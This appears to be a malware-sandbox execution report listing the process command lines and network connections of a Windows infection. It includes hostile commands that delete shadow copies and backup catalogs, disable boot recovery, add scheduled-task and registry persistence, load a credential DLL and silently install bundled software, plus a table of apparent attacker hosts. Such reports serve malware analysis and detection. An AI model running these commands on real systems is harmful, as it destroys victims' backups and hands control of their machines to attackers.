C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffa41e946f8,0x7ffa41e94708,0x7ffa41e94718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 12240 -ip 12240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 12240 -s 296
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=72 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3972 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
"C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4676 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe
"C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe" /update /Silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
"C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe" /delfolder
C:\Program Files (x86)\MaskVPN\MaskVPN.exe
"C:\Program Files (x86)\MaskVPN\MaskVPN.exe" /tray
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_5E84.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
Network
| Country | Destination | Domain | Proto |
| N/A | 20.54.89.106:443 | tcp | |
| N/A | 8.8.8.8:53 | fe3cr.delivery.mp.microsoft.com | udp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.159.134:443 | tcp | |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | tcp | |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.26:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
